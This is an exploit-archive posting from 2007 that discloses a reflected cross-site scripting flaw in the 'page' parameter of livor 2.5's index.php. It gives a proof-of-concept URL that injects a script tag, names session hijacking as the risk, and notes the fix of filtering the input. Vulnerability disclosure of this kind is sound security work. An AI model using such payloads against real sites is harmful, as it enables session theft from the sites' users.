Home / exploits livor-xss.txt
Posted on 08 April 2007
/* livor 2.5 Cross-Site Scripting Vulnerability */ //Author: Arham Muhammad //Source: http://www.arizona-dream.com/Usa/Divers/scriptsphp/scripts/livor.zip //Vulnerable File: index.php //XsS: http://victim/path/index.php?page=//</script><script>alert(/xss/);</script> //Risk: Session Hijack //Fix: The Variable "page" Need To Be Properly Filtered To Avoid Cross-Site Scripting Attempt! //Greets: USMAN,tushy,Hackman,str0ke